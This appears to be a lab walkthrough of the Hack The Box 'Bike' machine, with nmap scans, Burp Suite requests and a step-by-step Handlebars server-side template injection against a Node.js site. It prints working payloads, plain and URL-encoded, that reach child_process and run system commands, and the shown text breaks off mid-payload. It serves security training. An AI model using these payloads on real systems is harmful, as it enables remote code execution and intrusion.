07.BIKE (SSTI)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Node.js (Express middleware)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 22,80
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
 |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
 |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
 80/tcp open  http    Node.js (Express middleware)
 |_http-title:  Bike 
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,80
 PORT   STATE SERVICE
 22/tcp open  ssh
 80/tcp open  http
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.213.190
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.213.190:80/
 |     Form id: form
 |_    Form action: /
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag

#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
 Website under construction
 
  * possible vulnerable entry points
    - subcribe form
       - could be vulnerable to SQLi, SSTI, etc
 
root@htb:~$ BROWSER > {targetSite:port}
  Subscribe: [email protected]
   We will contact you at: {arbitrary email address}
   
 * submit expected input
    - the page reflected the email address entered by the user as output
       - possible vulnerabilities exists if the webapp doesn't sanitize user input
       
root@htb:~$ BROWSER > {targetSite:port} > wappalyzer
 Programming languages: Node.js
 Web frameworks: Express
 Javascript libraries: JQuery 2.2.4

#identification
root@oco:~$ BROWSER > {targetSite:port}
 input field: ${7*7}
 output: success
 
 input field: {{7*7}}
 output:
  Error: Parse error on line 1:
  {{7*7}}
  --^
  Expecting 'ID', 'STRING', 'NUMBER', 'BOOLEAN', 'UNDEFINED', 'NULL', 'DATA', got 'INVALID'
    at Parser.parseError (/root/Backend/node_modules/handlebars/dist/cjs/handlebars/compiler/parser.js:268:19)
    at Parser.parse (/root/Backend/node_modules/handlebars/dist/cjs/handlebars/compiler/parser.js:337:30)
    at HandlebarsEnvironment.parse (/root/Backend/node_modules/handlebars/dist/cjs/handlebars/compiler/base.js:46:43)
    at compileInput (/root/Backend/node_modules/handlebars/dist/cjs/handlebars/compiler/compiler.js:515:19)
    at ret (/root/Backend/node_modules/handlebars/dist/cjs/handlebars/compiler/compiler.js:524:18)
 
  * an error occurring isn't always a bad this. with this error, it means that the 
    payload was detected as valid by the template engine, however the code had
    some error and was unable to be executed.
     - for a Penetration Tester, error can provide valuable information
        - this particular error provided the following information
           -  the server is running from the /root/Backend directory and also that the 
              Handlebars Template Engine is being used
#setup
#require()
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{7*7}}
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7B%7B7*7%7D%7D&action=Submit

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7B%7B7*7%7D%7D&action=Submit
  
  * modify the initial %7B%7B7*7%7D%7D with a URL encoded payload specific to "handlebars nodejs"
#require() 
BURP > DECODER
 input:
  {{#with "s" as |string|}}
    {{#with "e"}}
    {{#with split as |conslist|}}
    {{this.pop}}
    {{this.push (lookup string.sub "constructor")}}
    {{this.pop}}
    {{#with string.split as |codelist|}}
    {{this.pop}}
    {{this.push "return require('child_process').exec('whoami');"}}
    {{this.pop}}
    {{#each conslist}}
    {{#with (string.sub.apply 0 codelist)}}
    {{this}}
    {{/with}}
    {{/each}}
    {{/with}}
    {{/with}}
    {{/with}}
 {{/with}}
 
 format: encode as...URL
  %7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d
  
 * When making a request to a web server, the data must be sent in a URL encoded format
   as certain characters NOT from the standard 128 character ASCII set will break
   the output of the page.
    - this means reserved characters that do not belong to this set must be encoded.
    
BURP > REPEATER
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit
 
 Response
  ...
  <pre>ReferenceError: require is not defined<br>...
  
 * require is a keyword in Javascript and more specifically Node.js that is used to 
   load code from other modules or files
    - if NodeJS won't accept the "require" keyword, utilize other methods such as
      global variables such as "process" object 
#process object
BURP > DECODER
 input:
  {{#with "s" as |string|}}
    {{#with "e"}}
    {{#with split as |conslist|}}
    {{this.pop}}
    {{this.push (lookup string.sub "constructor")}}
    {{this.pop}}
    {{#with string.split as |codelist|}}
    {{this.pop}}
    {{this.push "return process;"}}
    {{this.pop}}
    {{#each conslist}}
    {{#with (string.sub.apply 0 codelist)}}
    {{this}}
    {{/with}}
    {{/each}}
    {{/with}}
    {{/with}}
    {{/with}}
  {{/with}}
 
 format: encode as...URL
  %7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d
  
 * When making a request to a web server, the data must be sent in a URL encoded format
   as certain characters NOT from the standard 128 character ASCII set will break
   the output of the page.
    - this means reserved characters that do not belong to this set must be encoded.

BURP > REPEATER
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit
 
 Response
  ...
  <p class="result">
  We will contact you at:  e
  2
  [object Object]
  function Function() { [native code] }
  2
  [object Object]
  [object process]
  </p>
  
  * no error "object process" successful
#mainModule
#this tests whether the mainModule is accessible
BURP > DECODER
 input:
  {{#with "s" as |string|}}
   {{#with "e"}}
   {{#with split as |conslist|}}
   {{this.pop}}
   {{this.push (lookup string.sub "constructor")}}
   {{this.pop}}
   {{#with string.split as |codelist|}}
   {{this.pop}}
   {{this.push "return process.mainModule;"}}
   {{this.pop}}
   {{#each conslist}}
   {{#with (string.sub.apply 0 codelist)}}
   {{this}}
   {{/with}}
   {{/each}}
   {{/with}}
   {{/with}}
   {{/with}}
  {{/with}}
 
 format: encode as...URL
  %7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d
  
 * When making a request to a web server, the data must be sent in a URL encoded format
   as certain characters NOT from the standard 128 character ASCII set will break
   the output of the page.
    - this means reserved characters that do not belong to this set must be encoded.

BURP > REPEATER
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit
 
 Response
  ...
  <p class="result">
  We will contact you at:  e
  2
  [object Object]
  function Function() { [native code] }
  2
  [object Object]
  [object Object]
  </p>
  
  * no error mainModule successful
#require and child process module
BURP > DECODER
 input:
  {{#with "s" as |string|}}
   {{#with "e"}}
   {{#with split as |conslist|}}
   {{this.pop}}
   {{this.push (lookup string.sub "constructor")}}
   {{this.pop}}
   {{#with string.split as |codelist|}}
   {{this.pop}}
   {{this.push "return process.mainModule.require('child_process');"}}
   {{this.pop}}
   {{#each conslist}}
   {{#with (string.sub.apply 0 codelist)}}
   {{this}}
   {{/with}}
   {{/each}}
   {{/with}}
   {{/with}}
   {{/with}}
  {{/with}}
 
 format: encode as...URL
  %7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%3b%22%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d
  
 * When making a request to a web server, the data must be sent in a URL encoded format
   as certain characters NOT from the standard 128 character ASCII set will break
   the output of the page.
    - this means reserved characters that do not belong to this set must be encoded.

BURP > REPEATER
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%3b%22%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d&action=Submit
 
 Response
  ...
  <p class="result">
  We will contact you at:    e
  2
  [object Object]
  function Function() { [native code] }
  2
  [object Object]
  [object Object]
  </p>
  
  * no error require & child process successful
#running system cmds
BURP > DECODER
 input:
  {{#with "s" as |string|}}
   {{#with "e"}}
   {{#with split as |conslist|}}
   {{this.pop}}
   {{this.push (lookup string.sub "constructor")}}
   {{this.pop}}
   {{#with string.split as |codelist|}}
   {{this.pop}}
   {{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}
   {{this.pop}}
   {{#each conslist}}
   {{#with (string.sub.apply 0 codelist)}}
   {{this}}
   {{/with}}
   {{/each}}
   {{/with}}
   {{/with}}
   {{/with}}
  {{/with}}
 
 format: encode as...URL
  %7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%0a%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7